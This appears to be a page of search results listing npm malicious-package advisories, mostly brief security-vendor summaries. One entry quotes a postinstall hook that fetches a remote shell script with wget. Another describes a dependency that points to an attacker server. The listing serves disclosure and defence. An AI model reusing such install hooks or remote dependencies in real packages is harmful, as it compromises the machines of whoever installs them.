74 matches found
MAL-2026-10282 Malicious code in acidic (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8ef3583eb4d5b190d763cd784f5a40cb2cddaa8f1b6cd81b8a663bb612b51bb7 The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...
Malicious code in sixseven4 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1dfd6ff82b27df8c8ecd3520e70b720e0ff6e6f4443e21d1230acebdfd032b6d The package declares no install/postinstall/preinstall lifecycle scripts, and its declared main is sw.js — a browser ServiceWorker that uses...
MAL-2026-6594 Malicious code in vkzmn (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dc2e10775ac70e6f3b083ac0a76374e09e11cac7b06068a4bd3b6114f796a0df package.json declares a postinstall lifecycle hook that runs wget https://codeberg.org/atilalogical/wormteste/raw/branch/main/downprocwork.sh -O d.sh...
MAL-2026-6508 Malicious code in tw-style-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fc430da42cdbbb83b681be645a2bbc3f3f2a48e0e19d9d3624b4b3e6f9aa7e92 [email protected] was scanned and produced no findings indicative of supply-chain attack behavior. No install-time lifecycle scripts performing...
MAL-2026-6039 Malicious code in @mastra/temporal (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 214be711b41a8883e3252f0e9e41bc902d62da7650334b2efdc7424194989101 The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...
MAL-2026-2691 Malicious code in base-counter-web (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0d62a2050cc5eeb2ef06d0fc82867045f7b3d45cb4285dee67a182482ec29fb7 The package base-counter-web was found to contain malicious code. Source: ghsa-malware a14be5d8c05cd4abe5d7c7cc81e7da406ff18dfed1f6b64d1eb731c9344b4e...
Malicious code in shop-republik-ch (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector da3fe1a756db5b61e6883fb43ab2f27fd56333e302ad597c4bb9f1743b1f19b6 The package shop-republik-ch was found to contain malicious code. Source: ghsa-malware b68c5977e45306e58eda4d2345cb1ac0eba178c179064471f3327a30915e6d...
Malicious code in trex-proxy-browser-extension-sdk (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9eb36a59a719cff949c203a03a41c54b637bb1974bdea728b1bc15e837a7db45 The package trex-proxy-browser-extension-sdk was found to contain malicious code. Source: ghsa-malware...
MAL-2026-1552 Malicious code in typescript-nhost (npm)
The package 'typescript-nhost' is part of the PhantomRaven supply chain attack campaign Wave 2. It uses a Remote Dynamic Dependency RDD technique: the published package appears benign but includes a URL-based dependency in package.json pointing to an attacker-controlled C2 server...
MAL-2026-1398 Malicious code in meta-internal-logger-drzak (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1483f98fd78866cc6a27d31d99659bbb2912ec70d8771a004837f6fa46661a78 The package meta-internal-logger-drzak was found to contain malicious code. Source: ghsa-malware...
MAL-2026-1394 Malicious code in dell-emc-internal-api-drzak (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 79b1c68a3106c50c73d1ede904d8c6fe7b41466a0e619e50c0935a7988293740 The package dell-emc-internal-api-drzak was found to contain malicious code. Source: ghsa-malware...
MAL-2026-536 Malicious code in morgan.js (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 34775085e6638773de4ccac41092ae9954c9889f2c2a7bcd7cb7909375b53c4c The package morgan.js was found to contain malicious code. Source: ghsa-malware 6d6ee3da39907b410bc3a7d0baf6736a9c9c2f1c770a6e749c5ad2119c848d9f Any...
Malicious code in rt-interactive-card-collection (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9858817ec5f5e5af9db5f5033c3626e4214faa07e1169e950573bbca309a975e The package rt-interactive-card-collection was found to contain malicious code. Source: ghsa-malware...
MAL-2025-192622 Malicious code in chai-as-awaited (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0e469d359c2a3a5ca20b47691e64d2330d38d9ad0f173fb440b2ac677d333d6a The package chai-as-awaited was found to contain malicious code. Source: ghsa-malware df0ec4507c7a16056091fbf705d97408c308041bf9b5798d113fdc3042a00b3...
Malicious code in elf-stats-candlelit-marshmallow-663 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e8cf5bd84066a57d6f168967adc62dd26c49c4095817e6db922dc357f63f824e The package elf-stats-candlelit-marshmallow-663 was found to contain malicious code. Source: ghsa-malware...
Malicious code in @browserbasehq/director-ai (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b86bd8a3bb8b027a0b305fca0e5616b1f8cfee1229e47609ef43a14edb2ad0c6 The package @browserbasehq/director-ai was found to contain malicious code. Source: ghsa-malware...
Malicious code in iron-shield-miniapp (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6a7b0e4007bb817da7fd19c6ddd7f073f585337504d8ac60541b07e162398b70 The package iron-shield-miniapp was found to contain malicious code. Source: ghsa-malware...
Malicious code in @ensdomains/address-encoder (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ec8264ecb2af0b5028f08af1a108f7fe73cd1cbe55ea2cb7102a3e28b2e1052e The package @ensdomains/address-encoder was found to contain malicious code. Source: ghsa-malware...
MAL-2025-55017 Malicious code in @mts-ds/icons (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0112c17ea22a1384f1973813b785859e61805e29b2027b835dfa81c022bd846e The package @mts-ds/icons was found to contain malicious code. Source: ghsa-malware b51afa604dd61e1408dc95f628c00b6b379d7191214d2b77258a2a97f0cb38e4...
Malicious code in @aio-commerce-sdk/config-typescript (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 85b2c7fad2af3e611f7fe4d8399529e1b897e4ca8838e1a5db0a2c61acb4d998 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...